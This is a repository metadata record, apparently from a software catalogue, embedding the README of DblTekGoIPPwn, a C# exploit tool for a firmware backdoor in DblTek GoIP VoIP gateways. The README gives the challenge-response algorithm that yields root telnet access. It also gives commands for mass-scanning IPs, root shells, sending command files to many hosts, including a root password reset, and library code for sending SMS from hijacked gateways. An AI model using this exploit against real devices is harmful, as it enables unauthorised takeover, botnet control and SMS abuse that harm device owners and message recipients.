{"id":13463939,"url":"https://github.com/JacobMisirian/DblTekGoIPPwn","last_synced_at":"2025-03-25T09:31:17.572Z","repository":{"id":96585306,"uuid":"83937423","full_name":"JacobMisirian/DblTekGoIPPwn","owner":"JacobMisirian","description":"Tool to check if an IP of a DblTek GoIP is vulnerable to a challenge-response login system, send SMS messages from the system, execute remote commands botnet style, and generate responses to challenges.","archived":false,"fork":false,"pushed_at":"2019-12-12T18:38:27.000Z","size":29,"stargazers_count":60,"open_issues_count":2,"forks_count":26,"subscribers_count":15,"default_branch":"master","last_synced_at":"2024-10-29T16:22:08.715Z","etag":null,"topics":["challenge-response","dbltek-goip","gsm","gsm-modem","hacking-tool","penetration-testing","sms","sms-gateway","telnet","voip","vulnerability"],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JacobMisirian.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-03-05T01:50:56.000Z","updated_at":"2024-10-27T05:44:40.000Z","dependencies_parsed_at":"2023-03-13T16:29:17.068Z","dependency_job_id":null,"html_url":"https://github.com/JacobMisirian/DblTekGoIPPwn","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JacobMisirian%2FDblTekGoIPPwn","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JacobMisirian%2FDblTekGoIPPwn/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories
/JacobMisirian%2FDblTekGoIPPwn/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JacobMisirian%2FDblTekGoIPPwn/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/JacobMisirian","download_url":"https://codeload.github.com/JacobMisirian/DblTekGoIPPwn/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245435136,"owners_count":20614839,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["challenge-response","dbltek-goip","gsm","gsm-modem","hacking-tool","penetration-testing","sms","sms-gateway","telnet","voip","vulnerability"],"created_at":"2024-07-31T14:00:30.939Z","updated_at":"2025-03-25T09:31:14.993Z","avatar_url":"https://github.com/JacobMisirian.png","language":"C#","funding_links":[],"categories":["C# #"],"sub_categories":[],"readme":"# DblTekGoIPPwn\n\nTool to exploit challenge response system in vulnerable DblTek GoIP devices. Can generate responses to\nspecified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, send SMS messages from a host, and drop\ninto a root shell on any vulnerable host.\n\n## The Vulnerability\n\nOn March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek\nGoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named 'dbladm'. 
When\na user entered this as their username in a telnet prompt, the system would present a challenge that when\nfollowed with the right response, gave the user a root shell on the system.\n\nThe problem with such a challenge response system is that the devices are as secure as the algorithm for\ngenerating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this\nalgorithm, a root shell can be acquired on ANY DblTek GoIP device.\n\nOriginal Article: https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/\n\nUsing the description of the backdoor provided in the article, I was able to write what I believe to be\nsome of the first exploit code for this vulnerability. The core of this is of course the algorithm to\ngenerate the response based on a given challenge. Here is a function to do this written in C#.\n\n```C#\nstatic string ComputeResponse(string challengeStr)\n{\n    int challenge = Convert.ToInt32(challengeStr.Substring(1)); // Get just the number after 'N'.\n\n    string modified = (challenge + 20139 + (challenge \u003e\u003e 3)).ToString(); // Perform some dummy 1337 operations.\n\n    byte[] buffer = new byte[64];\n    // Copy the string into the first part of the buffer.\n    for (int i = 0; i \u003c modified.Length; i++)\n        buffer[i] = (byte)modified[i];\n\n    var md5 = MD5.Create();\n    byte[] hash = md5.ComputeHash(buffer); // Calculate the MD5 of the buffer.\n\n    StringBuilder sb = new StringBuilder(); // Will hold the results.\n    // Take the unpadded hex value of the first six bytes of the MD5.\n    for (int i = 0; i \u003c 6; i++)\n        sb.Append(hash[i].ToString(\"x\"));\n\n    return sb.ToString(); // Profit\n}\n```\n\n## DblTekGoIPPwn Command Line Interface (CLI)\n\nWhen DblTekPwn is run without arguments, the help is displayed. 
This is the output:\n\n```\nUSAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]\n\n[MODE]:\n-c --compute-response [CHALLENGE]         Computes a response to the given challenge.\n-r --root-shell                           Starts a root shell with the vulnerable host.\n-s --send-commands    [COMMAND_FILE]      Sends commands from a file to vulnerable hosts.\n-t --test                                 Tests hosts and determines if they are vulnerable.\n-h --help                                 Displays this help and exits.\n\n[HOSTS]:\n-n --name             [IP]                Specifies a single IP address.\n-f --file             [IP_FILE]           Specifies a file with IP\\nIP\\nIP.\n\n[OUTPUT]:\n-o --output           [OUTPUT_FILE]       Specifies an output file. Default stdin.\n```\n\n## Examples\n\n### Getting a Root Shell on a Vulnerable System\n\nDblTekGoIPPwn makes it easy to get a root shell on any vulnerable system. Simply run the\nfollowing command using the vulnerable IP.\n\n```\nDblTekPwn.exe --root-shell --name 192.168.1.1\n```\n\nYou will see output that looks like this:\n```\nPassword: ***********\n\n```\n\nFrom here you can begin entering commands (there is no shell prompt).\n\n### Calculating a Challenge Response\n\nSay you wanted to calculate the response to a GoIP challenge ```N1746203308```. You would just\nrun the following command.\n\n```\nDblTekPwn --compute-response N1746203308\n```\n\nThe output will be the response:\n```\nd6176d3aab2\n```\n\n### Checking a List of IPs\n\nSay you wished to check ```list.txt``` of IPs for GoIPs that are vulnerable and send this output\nto ```results.txt```. First make sure that the IPs are in format ```ip:port``` (port is default 23)\nand that the IPs are separated by a newline ```\\n```. 
The following command could then be run.\n\n```\nDblTekPwn.exe --test --file list.txt --output results.txt\n```\n\nlist.txt:\n```\n192.168.1.0\n192.168.1.1\n192.168.1.2:1337\n192.168.1.3\n192.168.1.4:2323\n```\n\nresults.txt:\n```\n192.168.1.0 False\n192.168.1.1 True\n192.168.1.2:1337 True\n192.168.1.3 False\n192.168.1.4:2323 False\n```\n\nThe ```False``` or ```True``` after the host indicates whether or not the IP is vulnerable.\n\n### Sending Commands to a List of IPs\n\nSay you had a list of commands (which is really a list of telnet inputs) in ```cmds.txt```\nto send to ```list.txt``` of IPs and send the output to ```results.txt```. First make sure\nthat the IPs are in format ```ip:port``` (port is default 23) and that BOTH the IPs AND commands\nare separated by a newline ```\\n``` in their respective files. The following command could then\nbe run.\n\n```\nDblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt\n```\n\nlist.txt:\n```\n192.168.1.0\n192.168.1.1\n192.168.1.2:1337\n192.168.1.3\n192.168.1.4:2323\n```\n\ncmds.txt:\n```\npasswd root\ntoor\ntoor\n\nexit\n```\n\nresults.txt:\n```\n192.168.1.0 False\n192.168.1.1 True\n192.168.1.2:1337 True\n192.168.1.3 False\n192.168.1.4:2323 False\n```\n\nThe ```False``` or ```True``` after the host indicates whether or not the connection was successfully\nmade and the commands delivered.\n\n## Using the DblTekPwn.SMS Library\n\nThe code in this GitHub repository provides an abstraction for sending SMS (text) messages from a hacked GoIP. To use this code,\ninclude DblTekPwn.exe in your application and add the following ```using``` statement.\n\n```C#\nusing DblTekPwn.SMS;\n```\n\nNow in your code you can use the static ```SmsSender.SendSms``` method. 
Here are a few examples.\n\n### Sending SMS From a Single Number to a Single Number\n\n```C#\nstring[] nums = new string[] { \"18005551234\" };\nstring goIP = \"192.168.1.3\";\nstring msg = \"Hello, World!\";\nSmsSender.SendSms(goIP, 23, nums, msg);\n```\n\n### Sending SMS From Multiple Numbers to a Single Number\n\nMost GoIPs have up to 32 SIM cards onboard, allowing the hacker to send SMS messages from all of these lines.\n\n```C#\nstring[] nums = new string[] { \"18005551234\" };\nstring goIP = \"192.168.1.3\";\nstring msg = \"Hai\";\nint numbers = 15;\nSmsSender.SendSms(goIP, 23, nums, msg, 1, numbers);\n```\n\n### Sending SMS From Multiple Numbers to Multiple Numbers\n\n```C#\nstring[] nums = new string[] { \"18005551234\", \"18005554321\", \"18005551337\" };\nstring goIP = \"192.168.1.3\";\nstring msg = \"We are legion\";\nint numbers = 32;\nSmsSender.SendSms(goIP, 23, nums, msg, 1, numbers);\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJacobMisirian%2FDblTekGoIPPwn","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FJacobMisirian%2FDblTekGoIPPwn","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJacobMisirian%2FDblTekGoIPPwn/lists"}